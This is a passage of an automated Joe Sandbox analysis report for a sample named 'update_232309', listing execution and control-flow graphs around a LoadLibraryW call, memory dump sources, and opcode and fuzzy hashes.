                                                                                                                                          • Instruction ID: 4bd5a31dc144c3edb700a9b4010e4dedd0d379c720c89826156cfe616c24a63a
                                                                                                                                          • Opcode Fuzzy Hash: ddcaaf691e74849f3a4e545aae5a4de588ef8d6a051b88ac53e1b90eed3301a7
                                                                                                                                          • Instruction Fuzzy Hash: C341C17040EBC44FD756DB38D8459523FF0EF5A320B1506EFD488CB1ABE625A846C792
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Execution Graph

                                                                                                                                          Execution Coverage:15.5%
                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                          Signature Coverage:0%
                                                                                                                                          Total number of Nodes:3
                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                          execution_graph 9511 7ffbad3a8c44 9513 7ffbad3a8c4d LoadLibraryW 9511->9513 9514 7ffbad3a8cfd 9513->9514

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 558 7ffbad3a8c44-7ffbad3a8c4b 559 7ffbad3a8c56-7ffbad3a8cbf 558->559 560 7ffbad3a8c4d-7ffbad3a8c55 558->560 563 7ffbad3a8cc9-7ffbad3a8cfb LoadLibraryW 559->563 564 7ffbad3a8cc1-7ffbad3a8cc6 559->564 560->559 565 7ffbad3a8d03-7ffbad3a8d2a 563->565 566 7ffbad3a8cfd 563->566 564->563 566->565
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000B.00000002.391650782.00007FFBAD3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD3A0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_11_2_7ffbad3a0000_update_232309.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                          • Opcode ID: 049595def7f9541a7e1bef7081a782d155266b0e29fb903462c933e7d678a812
                                                                                                                                          • Instruction ID: d6376d6b14dfd79d418f7a22e85994cd41cf748862b10034a09f46f5d9a51efd
                                                                                                                                          • Opcode Fuzzy Hash: 049595def7f9541a7e1bef7081a782d155266b0e29fb903462c933e7d678a812
                                                                                                                                          • Instruction Fuzzy Hash: 8E31D37190DA4C8FDB59DB6C9448BE9BBF0FF69311F04422BD049D3252DB74A805CB91
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000B.00000002.390975743.00007FFBAD27D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD27D000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_11_2_7ffbad27d000_update_232309.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 84aa283b6fa3451336be578f3ebce3ff0b846b0d1f96068cd4e479ef748206c1
                                                                                                                                          • Instruction ID: 90df0dfdc2b8300994f2d4ca1bcdea39663f72416d82c7551403da7eb70b2a12
                                                                                                                                          • Opcode Fuzzy Hash: 84aa283b6fa3451336be578f3ebce3ff0b846b0d1f96068cd4e479ef748206c1
                                                                                                                                          • Instruction Fuzzy Hash: 4C41C17040EBC44FD7569B39D8859523FF0EF5A320B1505DFD088CB1A7D625A84ACBA2
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Execution Graph

                                                                                                                                          Execution Coverage:14.7%
                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                          Signature Coverage:0%
                                                                                                                                          Total number of Nodes:3
                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                          execution_graph 9220 7ffbad368c44 9221 7ffbad368c4d LoadLibraryW 9220->9221 9223 7ffbad368cfd 9221->9223

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1063 7ffbad368c44-7ffbad368c4b 1064 7ffbad368c4d-7ffbad368c55 1063->1064 1065 7ffbad368c56-7ffbad368cbf 1063->1065 1064->1065 1068 7ffbad368cc1-7ffbad368cc6 1065->1068 1069 7ffbad368cc9-7ffbad368cfb LoadLibraryW 1065->1069 1068->1069 1070 7ffbad368cfd 1069->1070 1071 7ffbad368d03-7ffbad368d2a 1069->1071 1070->1071
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000C.00000002.403823791.00007FFBAD360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD360000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffbad360000_update_232309.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                          • Opcode ID: 1eeed5846e34eab9ed400183d1e06c438fea5b94c6613f863d83c9aee79187e2
                                                                                                                                          • Instruction ID: 235e8af686a3178ffe33d098efa3c5780a94f1cc9e402bca93574704bce13b7e
                                                                                                                                          • Opcode Fuzzy Hash: 1eeed5846e34eab9ed400183d1e06c438fea5b94c6613f863d83c9aee79187e2
                                                                                                                                          • Instruction Fuzzy Hash: 0331D37190DA4C8FDB59DF6C9448BE9BBE0FF69311F04422BD009D3292DB74A455CB91
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 0000000C.00000002.403287754.00007FFBAD23D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD23D000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffbad23d000_update_232309.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8dd4300115801daea9d010585d3d1344ceef378d3a61e6d35b0bfab491f1cc59
                                                                                                                                          • Instruction ID: 0542417e59a11dbf35c7d82f75fd318a28272737c5365bf5b3c1fb0f7d6a8a46
                                                                                                                                          • Opcode Fuzzy Hash: 8dd4300115801daea9d010585d3d1344ceef378d3a61e6d35b0bfab491f1cc59
                                                                                                                                          • Instruction Fuzzy Hash: 3241D07140EBC44FD75A9B38E8459A23FF0EF5A320B1505DFD088CB1A7D625A84AC7A2
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%